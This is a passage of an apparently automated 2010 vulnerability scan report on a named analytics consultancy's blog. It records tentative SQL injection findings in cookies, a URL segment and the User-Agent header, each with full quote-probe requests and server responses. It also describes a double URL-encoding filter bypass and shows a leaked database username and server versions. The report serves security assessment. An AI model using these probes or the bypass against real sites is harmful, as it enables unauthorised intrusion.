Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:32:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:32:21 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:32:21 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23848


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.115. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/89-dont-kill-the-messenger.html

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:45:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:45:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.116. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/89-dont-kill-the-messenger.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:56:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:57:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.117. http://www.analyticspros.com/blog/googleanalytics/91-google-analytics-cookies-and-domains.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/91-google-analytics-cookies-and-domains.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog'/googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 06:29:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 06:29:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /blog''/googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:29:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.118. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:54:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)''
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:54:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:54:09 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:54:09 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37533


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.119. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:49:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:49:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:49:27 GMT; path=/
Last-Modified: Fri, 05 Nov 2010 23:49:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37533


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.120. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:45:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:45:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:45:11 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:45:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.121. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:46:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:46:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:46:11 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:46:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37533


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.122. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [optimizelyEndUserId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

